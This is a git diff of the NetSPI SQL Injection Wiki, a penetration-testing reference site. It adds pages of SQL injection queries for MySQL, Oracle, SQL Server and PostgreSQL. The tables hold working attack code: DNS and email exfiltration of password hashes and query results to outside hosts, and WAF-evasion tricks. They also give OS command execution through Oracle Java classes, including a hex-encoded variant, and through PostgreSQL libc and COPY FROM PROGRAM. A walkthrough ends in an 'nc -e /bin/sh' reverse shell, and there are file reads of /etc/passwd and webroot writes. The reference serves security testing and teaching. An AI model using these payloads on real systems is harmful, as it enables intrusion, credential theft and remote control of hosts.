-
-
-
NetSPI SQL Injection Wiki
======================
-This wiki's mission is to be a one stop resource for fully identifying, exploiting, and escalating SQL injection vulnerabilities across various Database Management Systems. Want to know more? Check out the release [blog](https://blog.netspi.com/netspi-sql-injection-wiki/)!
-
-## Contributing
-
-### Structure
-
-All DBMS content is located in the ./build directory, under the appropriate DBMS. Any basic content changes should be made in this folder. Adding a new DBMS is not currently a well abstracted process. Submit an issue for help in adding an entire new DBMS. Top level pages with no DBMS tabs can be added in the ./views directory and included in [./views/nav.html](./views/nav.html).
-
-More detailed documentation coming soon.
-
-### Style
-
-Follow the styles already set in the existing files if not listed below.
+This wiki's mission is to be a one stop resource for fully identifying, exploiting, and escalating SQL injection vulnerabilities across various Database Management Systems. You can visit the live version at [sqlwiki.netspi.com](https://sqlwiki.netspi.com/)
-- All tables should have classes of `table table-striped table-hover`
-- All code snippets should be wrapped in `' or " after various parameters and getting a database error returned from the web server. The sections below describe where to find and how to detect these parameters.
+dbmsIdentification: Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.
+errorBased: Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.
+unionBased: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). You can try to enumerate the amount of columns using error based enumeration (see error based injection).
+blindBased: Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.
+conditionalStatements: Conditional statements are beneficial for creating complex queries and aiding in Blind Injection.
+injectionPlacement: SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.
+injectionObfuscation: Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations, they may require modification before being applied to certain injections.
+dataExfiltration: Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.
+dataTargeting: Being able to properly target and identify sensitive information can exponentially decrease time spent in a database. This means less time spent poking around and more time spent researching other vectors.
+executingOSCommands: Running OS commands is one of the primary objectives of SQL injection - this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
+informationGathering: It is often valuable to gather information about any testing environment; version numbers, user accounts, and databases all help in escalating vulnerabilities. Below are common methods for this.
+lateralMovement: Lateral movement allows a tester to gain access to different sets of functionality/data that don't explicitly require a more privileged user. Switching user accounts laterally will expose different information and could aid in compromising a more privileged user.
+privilegeEscalation: Certain functionalities require a privileged user and for escalating a vulnerability a privileged user is always the first step.
+readingAndWritingFiles: Reading and writing to files aids in data gathering as well as data exfiltration. Many methods include writing to the webroot, which enables a web shell to be executed, or allowing data to be exfiltrated over port 80/443.
+persistence: Gaining persistence on a system creates a semi-permanent foothold in the network, allowing prolonged exploitation time. With this extra time different vectors and exploit methods can be attempted.
+parameterManipulation: Manipulating parameters aids in bypassing Web Application Firewalls, Anti-Virus scanners, and allows modification of various SQL queries for unique situations.
diff --git a/_data/metadata.yml b/_data/metadata.yml
new file mode 100644
index 0000000..da5abc0
--- /dev/null
+++ b/_data/metadata.yml
@@ -0,0 +1,5 @@
+googleTagManagerID: GTM-M7JZ64N
+keywords: netspi, sql injection, wiki, sqli, sql, injection, netspy, network security professionals, oracle, mysql, sqlserver, mssql, cheat sheet, cheat, sheet
+ogImageLink: /assets/images/facebookCard.jpg
+twitterImageLink: /assets/images/twitterCard.jpg
+title: NetSPI SQL Injection Wiki
diff --git a/_data/nav.yml b/_data/nav.yml
new file mode 100644
index 0000000..9eaf2fe
--- /dev/null
+++ b/_data/nav.yml
@@ -0,0 +1,56 @@
+- title: Home
+ url: /
+- title: About Us
+ url: https://netspi.com
+ external: true
+- title: Injection Detection
+ url: /detection
+- title: DBMS Identification
+ url: /dbmsIdentification/
+- title: Injection Types
+ url: /injectionTypes/
+ children:
+ - title: Error Based Injection
+ url: /injectionTypes/errorBased/
+ - title: Union Based Injection
+ url: /injectionTypes/unionBased/
+ - title: Blind Based Injection
+ url: /injectionTypes/blindBased/
+- title: Injection Techniques
+ url: /injectionTechniques/
+ children:
+ - title: Conditional Statements
+ url: /injectionTechniques/conditionalStatements/
+ - title: Injection Placement
+ url: /injectionTechniques/injectionPlacement/
+ - title: Injection Obfuscation
+ url: /injectionTechniques/obfuscation/
+- title: Attack Queries
+ url: /attackQueries/
+ children:
+ - title: Information Gathering
+ url: /attackQueries/informationGathering/
+ - title: Data Targeting
+ url: /attackQueries/dataTargeting/
+ - title: Privilege Escalation
+ url: /attackQueries/privilegeEscalation/
+ - title: Executing OS Commands
+ url: /attackQueries/executingOSCommands/
+ - title: Reading and Writing Files
+ url: /attackQueries/readingAndWritingFiles/
+ - title: Lateral Movement
+ url: /attackQueries/lateralMovement/
+ - title: Data Exfiltration
+ url: /attackQueries/dataExfiltration/
+ - title: Persistence
+ url: /attackQueries/persistence/
+- title: Misc.
+ children:
+ - title: Contributors
+ url: /misc/contributors
+ - title: References
+ url: /misc/references/
+ - title: Sandboxes
+ url: /misc/sandboxes/
+ - title: Tools
+ url: /misc/tools/
diff --git a/_includes/noInjections.html b/_includes/noInjections.html
new file mode 100644
index 0000000..5e0cfeb
--- /dev/null
+++ b/_includes/noInjections.html
@@ -0,0 +1 @@
+No data yet, please contribute on our Github if you know any useful methods!
diff --git a/assets/images/facebookCard.jpg b/assets/images/facebookCard.jpg new file mode 100644 index 0000000..d319612 Binary files /dev/null and b/assets/images/facebookCard.jpg differ diff --git a/assets/images/favicon.ico b/assets/images/favicon.ico new file mode 100644 index 0000000..99ae406 Binary files /dev/null and b/assets/images/favicon.ico differ diff --git a/assets/images/logo.png b/assets/images/logo.png new file mode 100644 index 0000000..a637522 Binary files /dev/null and b/assets/images/logo.png differ diff --git a/assets/images/twitterCard.jpg b/assets/images/twitterCard.jpg new file mode 100644 index 0000000..273e053 Binary files /dev/null and b/assets/images/twitterCard.jpg differ diff --git a/attackQueries/dataExfiltration/index.html b/attackQueries/dataExfiltration/index.html new file mode 100644 index 0000000..8277a76 --- /dev/null +++ b/attackQueries/dataExfiltration/index.html @@ -0,0 +1,16 @@ +--- +layout: tab +description: Exfiltrating data through SQL Injection allows easier data analysis, as well as an offline copy of any compromised data. +keywords: data exfiltration, exfiltration, breach +title: Data Exfiltration | NetSPI SQL Injection Wiki +tabs: + - title: MySQL + shortName: mysql + fileName: mysql.html + - title: Oracle + shortName: oracle + fileName: oracle.html + - title: SQL Server + shortName: sqlserver + fileName: sqlserver.html +--- diff --git a/build/MySQL/attackQueries/dataExfiltration.html b/attackQueries/dataExfiltration/mysql.html similarity index 87% rename from build/MySQL/attackQueries/dataExfiltration.html rename to attackQueries/dataExfiltration/mysql.html index e85fdf1..8ea22f3 100644 --- a/build/MySQL/attackQueries/dataExfiltration.html +++ b/attackQueries/dataExfiltration/mysql.html @@ -1,7 +1,7 @@{{site.data.injectionDescriptions.dataExfiltration}}
* Requires privileged user
| DNS Request | -SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), 'yourhost.com\\')) | +SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), '.yourhost.com\\')) | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| SMB Share | diff --git a/build/Oracle/attackQueries/dataExfiltration.html b/attackQueries/dataExfiltration/oracle.html similarity index 95% rename from build/Oracle/attackQueries/dataExfiltration.html rename to attackQueries/dataExfiltration/oracle.html index 47c6a4e..c934a80 100644 --- a/build/Oracle/attackQueries/dataExfiltration.html +++ b/attackQueries/dataExfiltration/oracle.html @@ -1,7 +1,7 @@
| Description | +Query | +
|---|---|
| Make DNS Request | +DECLARE @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins; exec('xp_fileexist "\' + @host + 'c$boot.ini"'); |
+
| UNC Path (DNS Request) | +
+ xp_dirtree '\\data.domain.com\file' + The UNC Path Injection Cheatsheet can be found here. + |
+
| Enable sp_send_dbmail and send query | +sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version'; | +
| Basic xp_sendmail Query | +EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.' | +
| Send Full Email with xp_sendmail | +EXEC xp_sendmail @recipients='harold@netspi.com', @message='This is a test.', @copy_recipients='test@netspi.com', @subject='TEST' |
+
| Send Query Results Via xp_sendmail | +EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version'; | +
| Send Query Results as Attachment Via xp_sendmail | +CREATE TABLE ##texttab (c1 text) INSERT ##texttab values ('Put messge here.') DECLARE @cmd varchar(56) SET @cmd = 'SELECT c1 from ##texttab' EXEC master.dbo.xp_sendmail 'robertk', @query = @cmd, @no_header='TRUE' DROP TABLE ##texttab |
+
{{site.data.injectionDescriptions.dataTargeting}}
{{site.data.injectionDescriptions.dataTargeting}}
{{site.data.injectionDescriptions.dataTargeting}}
{{site.data.injectionDescriptions.executingOSCommands}}
| Command Execution with MySQL CLI Access | -https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ | +https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ |
| Traversing directories (Linux) | +SELECT load_file("/etc/passwd") from information_schema |
{{site.data.injectionDescriptions.executingOSCommands}}
+ +Java can be used to execute commands if it's installed.
+| Description | +Query | +
|---|---|
| Creating Java Classes | +
+ /* create Java class */ BEGIN + EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String + stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new + FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};'; END; + / + BEGIN + + EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';'; END; + / + /* run OS command */ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; |
+
| Creating Java Classes (Hex encoded) | +
+ /* create Java class */ SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d'')); + EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); + end;')) results FROM dual + /* run OS command */ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; + |
+
{{site.data.injectionDescriptions.executingOSCommands}}
+ +| Name | +Query | +
|---|---|
|
+ + FROM PROGRAM + |
+
+ + DROP TABLE IF EXISTS myoutput; + CREATE TABLE myoutput(filename text); + COPY myoutput FROM PROGRAM 'ps aux'; + SELECT * FROM myoutput ORDER BY filename ASC; + |
+
|
+ + Create PostgreSQL Function Mapped + to Libc System Method + |
+
+ + CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT; + SELECT system('cat /etc/passwd | nc + + Notes: + + This method works with PostgreSQL 8.1 and below. After version 9, you'll have to upload your own library with the "PG_MODULE_MAGIC" set. + The process for this is outlined at https://www.dionach.com/blog/postgresql-9x-remote-command-execution, below is a summary. + + + 1. To get the version from the PostgreSQL server use the query below. + + SELECT version(); + + + 2. To compile the library, a Linux machine with the same version of PostgreSQL as the target machine is required. Below is an example showing how to install PostgreSQL. + + apt install postgresql postgresql-server-dev-9.6 + + + 3. Download pgexec file from https://github.com/Dionach/pgexec/tree/master. + + + 4. Compile pgexec with the command below. + + gcc -I$(/usr/local/pgsql/bin/pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c + + + 5. Upload the library to the target system. First split the file into pieces. + + split -b 2048 pg_exec.so + + + 6. The file can then be written to disk through PostgreSQL using the commands below. + + SELECT lo_creat(-1); + set c0 `base64 -w 0 xaa` + INSERT INTO pg_largeobject (loid, pageno, data) values (16388, 0, decode(:'c0', 'base64')); + + + Then repeat for each piece of the file. + + 7. Create the function. + + CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT; + + 8. Send a reverse shell to your system. + + SELECT sys('nc -e /bin/sh 10.0.0.1 4444'); + + + Source: https://www.dionach.com/blog/postgresql-9x-remote-command-execution + |
+
|
+ + Metasploit postgres_payload Module + This can be used with direct connections. + |
+
+ + https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload + exploit/linux/postgres/postgres_payload + |
+
{{site.data.injectionDescriptions.executingOSCommands}}
| Version | SELECT @@version | +||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| User | +SELECT user() SELECT system_user() |
+ ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Users | -SELECT user FROM mysql.user SELECT user(); SELECT system_user() * SELECT Super_priv FROM mysql.user WHERE user= 'root' LIMIT 1,1 |
+ SELECT user FROM mysql.user * SELECT Super_priv FROM mysql.user WHERE user= 'root' LIMIT 1,1 |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Current Database | -SELECT database() | +Tables | +SELECT table_schema, table_name FROM information_schema.tables | +||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Columns | +SELECT table_name, column_name FROM information_schema.columns | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Databases | SELECT schema_name FROM information_schema.schemata |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Tables | -SELECT table_schema,table_name FROM information_schema.tables | +Current Database Name | +SELECT database() | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Columns | -SELECT table_schema, table_name, column_name FROM information_schema.columns | +Query another Database | +USE [database_name]; SELECT database(); SELECT [column] FROM [database_name].[table_name] |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Number of Columns | -SELECT * FROM USERS ORDER BY 1 Increase 1 until query returns false, previous number was the amount of columns |
+ SELECT count(*) FROM information_schema.columns WHERE table_name = '[table_name]' | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| DBA Accounts | diff --git a/build/Oracle/attackQueries/informationGathering.html b/attackQueries/informationGathering/oracle.html similarity index 93% rename from build/Oracle/attackQueries/informationGathering.html rename to attackQueries/informationGathering/oracle.html index 5dd9410..139ddc6 100644 --- a/build/Oracle/attackQueries/informationGathering.html +++ b/attackQueries/informationGathering/oracle.html @@ -1,7 +1,7 @@
| SELECT username FROM all_users ORDER BY username; * SELECT name FROM sys.user$; |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Current Database | -SELECT global_name FROM global_name; SELECT name FROM v database; - SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL; |
- ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Databases | -SELECT DISTINCT owner FROM all_tables; | +Tables | +SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| DBA Accounts | -SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; | +Tables From Column Name | +SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Columns | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Tables | -SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; |
+ Current Database | +SELECT global_name FROM global_name; SELECT name FROM V$DATABASE; + SELECT instance_name FROM V$INSTANCE; SELECT SYS.DATABASE_NAME FROM DUAL; |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Tables From Column Name | -SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; | +Databases | +SELECT DISTINCT owner FROM all_tables; | +||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| DBA Accounts | +SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Privileges | diff --git a/attackQueries/informationGathering/postgresql.html b/attackQueries/informationGathering/postgresql.html new file mode 100644 index 0000000..ad18757 --- /dev/null +++ b/attackQueries/informationGathering/postgresql.html @@ -0,0 +1,100 @@ +
| Description | +Query | +
|---|---|
| Version | +SELECT version(); | +
| User | +
+ SELECT user; + SELECT current_user; + SELECT session_user; + SELECT usename FROM pg_user; + SELECT getpgusername(); + |
+
| Users | +SELECT usename FROM pg_user | +
| User Password Hashes | +SELECT usename, passwd FROM pg_shadow | +
| Privileges | +SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user | +
| List DBA Accounts | +SELECT usename FROM pg_user WHERE usesuper IS TRUE | +
| Current Database | +SELECT current_database() | +
| Databases | +SELECT datname FROM pg_database | +
| Tables | +SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid) | +
| Tables from Column Names | +SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid) | +
| Columns | +SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) | +
| Find Stored Procedures | +
+ SELECT proname + FROM pg_catalog.pg_namespace n + JOIN pg_catalog.pg_proc p + ON pronamespace = n.oid + WHERE nspname = 'public'; + |
+
| Comments | +
+ SELECT 1; –comment + SELECT /*comment*/1; + |
+
| Server Name | ++ |
| Host Name | +select inet_server_addr() | +
| Listening Port | +select inet_server_port(); | +
| List Settings | +SELECT * FROM pg_settings; | +
{{site.data.injectionDescriptions.informationGathering}}
| SELECT @@version; | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Database Name | -SELECT db_name(); | +User | +SELECT user; SELECT system_user; SELECT user_name(); SELECT loginame from master..sysprocesses where spid = @@SPID |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Databases | -SELECT name from master..sysdatabases; | +Users | +SELECT name from master..syslogins | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Server Name | -SELECT @@SERVERNAME | +Tables | +SELECT table_catalog, table_name FROM information_schema.columns | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Database Tables and Columns | -SELECT table_name, column_name FROM information_schema.columns | +Columns | +SELECT table_catalog, column_name FROM information_schema.columns | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Current Database User | -SELECT user; SELECT system_user; SELECT user_name(); SELECT loginame from master..sysprocesses where spid = @@SPID |
+ Databases | +SELECT name from master..sysdatabases; | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Users | -SELECT name from master..syslogins | +Database Name | +SELECT db_name(); | +||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Server Name | +SELECT @@SERVERNAME | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Find Stored Procedures | @@ -60,7 +64,7 @@|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Get SQL Domain User | +Domain User | https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/templates/tsql/Get-SQLDomainUser-Example.sql | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| View queries run on the system | +Query history | SELECT * FROM (SELECT COALESCE(OBJECT_NAME(qt.objectid),'Ad-Hoc') AS objectname, qt.objectid as objectid, last_execution_time, execution_count, encrypted, (SELECT TOP 1 SUBSTRING(qt.TEXT,statement_start_offset / 2+1,( (CASE WHEN statement_end_offset = -1 THEN (LEN(CONVERT(NVARCHAR(MAX),qt.TEXT)) * 2) ELSE statement_end_offset END)- statement_start_offset) / 2+1)) AS sql_statement FROM sys.dm_exec_query_stats AS qs CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS qt ) x ORDER BY execution_count DESC |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| List enabled audit specifications | +Enabled audit specifications | https://gist.github.com/nullbind/5da8b5113da007ba0111 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Local Administrators in Sysadmin Role | SELECT is_srvrolemember('sysadmin','BUILTIN\Administrators') | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Enable database mail | -sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version'; | -||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Basic xp_sendmail Query | -EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.' | -||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Send Full Email with xp_sendmail | -EXEC xp_sendmail @recipients='harold@netspi.com', @message='This is a test.', @copy_recipients='test@netspi.com', @subject='TEST' |
- ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Send Query Results Via xp_sendmail | -EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version'; | -||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Send Query Results as Attachment Via xp_sendmail | -CREATE TABLE ##texttab (c1 text) INSERT ##texttab values ('Put messge here.') DECLARE @cmd varchar(56) SET @cmd = 'SELECT c1 from ##texttab' EXEC master.dbo.xp_sendmail 'robertk', @query = @cmd, @no_header='TRUE' DROP TABLE ##texttab |
- ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Domain users and LDAP queries via database links and openrowset | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/Get-SQLDomainUser-Example.sql | diff --git a/attackQueries/lateralMovement/index.html b/attackQueries/lateralMovement/index.html new file mode 100644 index 0000000..aa3fb9d --- /dev/null +++ b/attackQueries/lateralMovement/index.html @@ -0,0 +1,16 @@ +--- +layout: tab +description: Lateral movement allows a tester to gain access to different sets of functionality/data that don't explicitly require a more privileged user. +title: Lateral Movement | NetSPI SQL Injection Wiki +keywords: privilege escalation, lateral, movement, lateral movement, privilege +tabs: + - title: MySQL + shortName: mysql + fileName: mysql.html + - title: Oracle + shortName: oracle + fileName: oracle.html + - title: SQL Server + shortName: sqlserver + fileName: sqlserver.html +--- diff --git a/build/MySQL/attackQueries/lateralMovement.html b/attackQueries/lateralMovement/mysql.html similarity index 86% rename from build/MySQL/attackQueries/lateralMovement.html rename to attackQueries/lateralMovement/mysql.html index 9c6dcb7..1081d66 100644 --- a/build/MySQL/attackQueries/lateralMovement.html +++ b/attackQueries/lateralMovement/mysql.html @@ -1,7 +1,7 @@
| Description | +Query | +
|---|---|
| Read Files from Operating System - COPY | +
+ CREATE TABLE mydata(t text); + COPY mydata FROM '/etc/passwd'; + SELECT * FROM mydata; + DROP TABLE mytest mytest; + |
+
| Read Files from Operating System - pg_read_file | ++ SELECT pg_read_file('/usr/local/pgsql/data/pg_hba.conf', 0, 200); + | +
| Writing Files from Operating System | +
+ CREATE TABLE mytable (mycol text); + INSERT INTO mytable(mycol) VALUES (''); + COPY mytable (mycol) TO '/var/www/test.php'; + |
+
{{site.data.injectionDescriptions.readingAndWritingFiles}}
* Requires privileged user
| Description | -Query | -
|---|---|
| XML Parse Error | -SELECT extractvalue(rand(),concat(0x3a,(select version()))) | -
